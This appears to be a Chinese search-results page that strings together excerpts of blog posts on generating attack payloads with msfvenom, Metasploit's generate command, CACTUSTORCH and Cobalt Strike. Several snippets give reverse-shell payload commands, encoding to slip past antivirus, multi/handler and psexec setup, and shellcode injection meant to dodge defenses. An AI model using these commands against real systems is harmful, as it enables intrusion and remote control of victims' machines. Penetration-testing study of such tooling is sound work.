精华内容
下载资源
问答
  • msfvenom生成payload

    2019-03-08 16:24:30
    最近看到了一个非常不错的个人博客,布局简洁、大方、美观,非常让人赏心悦目。推荐给大家: msfvenom生成payload https://ssooking.github.io/msfvenom-sheng-cheng-payload/ ...

    最近看到了一个非常不错的个人博客,布局简洁、大方、美观,非常让人赏心悦目。推荐给大家:

    msfvenom生成payload

    https://ssooking.github.io/msfvenom-sheng-cheng-payload/

     

    展开全文
  • msfvenom常用生成payload命令(第十课).docx
  • Java反序列化生成Payload附利用脚本,帮助运维测试weblogic及jboss等中间件的漏洞。
  • 本文讲的是工具介绍:使用CACTUSTORCH 生成Payload,CACTUSTORCH是一个生成payload的框架,可用于基于James Forshaw的DotNetToJScript工具的攻防对抗。这个工具允许C#二进制文件在payload内引导,提供可靠的手段绕...
    本文讲的是 工具介绍:使用CACTUSTORCH 生成PayloadCACTUSTORCH是一个生成payload的框架,可用于基于James Forshaw的DotNetToJScript工具的攻防对抗。这个工具允许C#二进制文件在payload内引导,提供可靠的手段绕过许多常见的防御。

    目前CACTUSTORCH支持以下payload类型:
    VBS
    VBA
    JS
    JSE
    WSF
    HTA
    VBE

    在此之前,我们是不能直接从不包括VBA宏多种格式中调用shellcode注入。CACTUSTORCH有一个独立的C#二进制,它能够接受一个二进制名称和base64编码的shellcode注入。另外,它借用了@armitagehacker / CobaltStrike的VBA宏注入的概念,可以注入32位的可执行文件。

    当前有效负载状态

    当前其实有在几个框架中已经存在支持多种格式的payload生成,包括Metasploit和Cobalt Strike。然而,他们在生成payload时总是有一些缺点。

    在Metasploit框架中,这些payload格式工作的情况如下:

    VBS:文件删除和执行,Touches disk
    HTA-PSH:使用WScript.Shell对象运行powershell.exe 
    VBA-EXE:文件丢弃并执行 ,Touches disk
    VBA:通过Kernel32 API的声明进行Shellcode注入 - Maldoc扫描的已知指标
    VBA-PSH:使用Shell对象运行powershell.exe

    在CobaltStrike中,以下payload格式的工作原理如下:

    VBS:虚拟目标,创建COM对象到Excel,创建工作表,注入VBA宏代码并执行。主要依赖于正在安装的Office和注入的VBA中的Kernel32 API声明
    VBA:通过Kernel32 API的声明进行Shellcode注入 - Maldoc扫描的已知指标
    HTA-EXE:文件丢弃并执行,Touches disk
    HTA-PSH:使用WScript.Shell对象运行powershell.exe
    HTA-VBA:绕着一个VBS做的弱化,对COM反对Excel,宏注入Kernel32 API声明中的VBA代码

    CACTUSTORCH的好处

    CACTUSTORCH为当前payload生成提供了一些改进,已经超出了目前公共框架的能力:

    在payload中不使用Kernel32 API声明
    在C#二进制内混淆
    允许任意指定目标二进制生成
    允许指定任意shellcode
    不产生PowerShell.exe
    不需要Powershell
    不需要office
    不调用WScript.Shell
    不需要分段,因为完整的无阶段shellcode可以包含在传送的payload内
    没有静态父对子进行生成,用户可以更改wscript.exe生成的内容

    exe产生Powershell.exe是可疑的,产生rundll32.exe可以说是有较少的危害的。你可以将其更改为calc.exe,ping.exe / t或类似的可疑二进制文件。

    使用CACTUSTORCH

    使用CACTUSTORCH是相对简单的,以下概述了生成自定义payload所需的步骤:

    克隆目录中选择要使用的payload格式
    选择要注入的二进制容器,必须存在于SYSWOW64和SYSTEM32中
    为您的监听器生成原始的shellcode
    $> cat payload.bin | base64 -w 0> out.txt
    将out.txt base64原始payload复制到模板的“代码”变量中
    如果为VBA执行,请通过vbasplit.py out.txt split.txt运行out.txt
    然后将split.txt复制到VBA模板中突出显示的代码段中
    payload准备就绪
    如果你想要混淆的话

    演示这些步骤的视频如下:

    与 Cobalt 的整合

    作为简化对手模拟活动的过程的一部分,我们创建了一个CACTUSTORCH攻击者脚本来促成这一点。

    加载攻击者脚本之后,在“攻击”选项卡下,将显示以下菜单作为选项。您现在可以选择要使用的payload和选项,它将生成payload并为您托管。在VBA代码方面,它将被呈现在一个文本框中,它可以被复制并粘贴到Word VBA宏中。

    工具介绍:使用CACTUSTORCH 生成Payload




    原文发布时间为:2017年7月13日
    本文作者:鲁班七号
    本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
    展开全文
  • metasploit生成payload

    千次阅读 2019-01-31 17:37:27
    在metasploit中,我们任意选定一个payload时,metasploit都会加上generate,pry,reload等命令~ 我们来看一下 在help输出的最后我们可以看到之前提到的命令 我们看下generate命令,首先-h查看帮助 我们当然也可以...

    在metasploit中,我们任意选定一个payload时,metasploit都会加上generate,pry,reload等命令~
    我们来看一下
    在这里插入图片描述
    在help输出的最后我们可以看到之前提到的命令
    在这里插入图片描述
    我们看下generate命令,首先-h查看帮助
    在这里插入图片描述
    我们当然也可以不用加上任何选项来生成shellcode
    在这里插入图片描述

    这么简单生成的shellcode基本上是不能用的。为了确保我们的shellcode有效,我们还需要结合靶机的具体情况,来过滤坏字符、选择特定类型的编码器等
    上面的shellcode中我们看到一个很常见的坏字符,即null(\x00),我们可以通过添加参数来告诉metasploit删除这个字节
    在这里插入图片描述
    这次生成的shellcode中null字符已经被移除了。这个shellcode就是有效的了。由于我们指定了参数,所以两次生成的结果中我们发现了其他的差异。
    一个很明显的区别就是之前的总字节大小是328字节,现在是355字节。
    这是因为在第二次shellcode生成过程中,空字节的原始作用需要被替换,或者编码。来保证两次shellcode的功能的一致
    仔细看看第二张截图,我们注意到相比第一张它还使用了encoder,我们称之为编码器。我们并没有显式指定,默认情况下,metasploit会选择最好的编码器来完成生成shellcode的任务。在这里,编码器负责删除-b后面指定的字符。
    这里使用的是”x86/shikata_ga_nai”编码器,这个编码器只在我们需要溢出null字符时使用。我们如果需要删除的坏字符不是null而是其他的,就会有不同的编码器来生成shellcode
    在这里插入图片描述
    我们看到这次又换了一个编码器来移除我们指定的字符。
    移除null字符用的shikata_ga_nai可能无法用来移除我们这次指定的字符,而fnstenv_mov可以做到。

    如果我们想要在shellcode中移除太多字节,那是不可能的。比如你要说hello world,但是我不让你使用26个英文字母,那你怎么说呢。
    我们来试试,一次性指定移除很多字节。

    在这里插入图片描述

    接下来我们来学习使用特定的编码器生成shellcode。比如说只有在包含非字母数字字符的情况下才能执行漏洞攻击利用。这种情况下,’shikata_ga_nai’编码器由于使用几乎全部的字符来编码,所以在我们假设的情况下是不适合的,我们应该选择其他编码器。

    我们在选择特定的编码器之前,先来看看有哪些编码器
    在这里插入图片描述在这里插入图片描述

    我们找到了一个’/x86/nonalpha’编码器

    那我们使用这个编码器来生成shellcode看看。使用-e 来指定编码器
    在这里插入图片描述

    当我们使用自己指定编码器时,我们注意到生成的shellcode比之前的大得多,有470字节。

    我们接下来学习如何把shellcode保存在文件中。使用-f选项。
    在这里插入图片描述
    注意到,我们使用-f选项后,shellcode不在终端输出了,直接保存在了指定的文件中
    我们使用cat命令查看一下:

    在这里插入图片描述
    接下来我们学习下如何简单地进行bypass处理。我们通过重复编码的方式进行。使用”-I”参数。-i用于执行在执行多少次数的编码才生成最终的有效载荷。
    在这里插入图片描述
    上图的示例就是编码了2次生成的shellcde
    将上图比最开始的第一张图对比,这次生成的shellcode的代码与仅有1次编码的shellcode有很大的不同

    我们这此的示例是以一个绑定shell进行示范的。它默认是在4444端口进行监听。通过我们都会自己指定端口,我们可以在生成shellcode时使用-o指定我们想要修改的参数和值。我们首先来看看我们有哪些可以修改的选项。
    在这里插入图片描述
    可以看到默认的EXITFUNC是process,LPORT是4444.我们改为she,1234.

    在这里插入图片描述
    我们生成payload时默认的输出的是ruby的个格式。我们当然也可以选择其他的格式,比如Perl,C,Java等。
    比如生成C的:
    在这里插入图片描述

    生成Java的
    在这里插入图片描述
    我们可以看到各种语言的输出都是符合相应的语法的。作为buffer的数组也都按照相应语言的格式声明了。这样我们可以很方便地复制粘贴。

    比如说在ruby里#是注释,但是在C中/*是注释。
    我们知道在写payloads的时候我们会用到NOP填充
    NOP的意思就是当前没有操作或者邻接的指令没有操作。我们可以使用-s选项来执行我们想要填充的NOP的数量,当然,填充的越多,shllcode的体量也越大。
    我们来比较下填充NOP前后
    填充之前
    在这里插入图片描述
    填充之后
    在这里插入图片描述
    342-328=14就是我们填充的NOP数目。我们比较一下就会发现,填充之后的第一行就是我们的14字节的NOP,第二行开始才和没有填充生成的字符完全相同,说明填充的NOP会被放置在payload的起始位置。

    展开全文
  • Cobalt Strike生成payload

    2021-03-19 19:38:01
    (2)生成各种语言的Payload (3)生成Windows木马 1.创建Linstener 步骤:Cobalt Strike—>Listeners—>Add afei CS4.0有以上8个Payload Beacons: Beacon DNS:可以将DNS的请求返回; Beacon ...
    展开全文
  • 生成payload # 查看所有payloads show payloads # 查看windows可用(输完按两下回车) use payload/windows/ # 使用绑定端口payload msf5 > use payload/windows/shell_bind_tcp # 查看payload编码,里面可能含有...
  • metasploit更新后去除了msfencode和msfpayload,并推出了全新的生成器:msfvenom msfvenom参数讲解 root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement...
  • msf生成payload过滤

    千次阅读 2015-04-25 16:21:30
    使用msfpayload模块默认生成的弹窗根本用不了啊,使用0day2上给的shellcode也是因为坏字符‘ 0A ’的存在。 所以只能使用过滤了。 root@bogon: ~ # msfconsole msf > use payload/windows/messagebox msf ...
  • use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z
  • msf下的各种生成payload命令 来自 : https://www.cnblogs.com/backlion/p/6000544.html
  • 攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1 linux: msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻 击机IP LPORT=攻击机端口 -f elf -o...
  • msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被...
  • Active exploit(主动地向目标机器发送payload并执行,使目标交出shell(反连等)) msf5 > use exploit/windows/smb/psexec msf5 exploit(windows/smb/psexec) > set RHOST 192.168.1.13 msf5 exploit...
  • 使用msfvenom -h命令查看所有参数常用参数:12345-p 设置 payload-e 设置编码方式-a 系统结构,默认x86-f 生成文件格式-o 保存 payloadWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=LPORT=...
  • 生成msf常用payload

    千次阅读 2018-06-04 10:49:29
    生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Windows、linux、ma...
  • msfvenom生成各类Payload命令     Often one of the most useful(and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 46,718
精华内容 18,687
关键字:

生成payload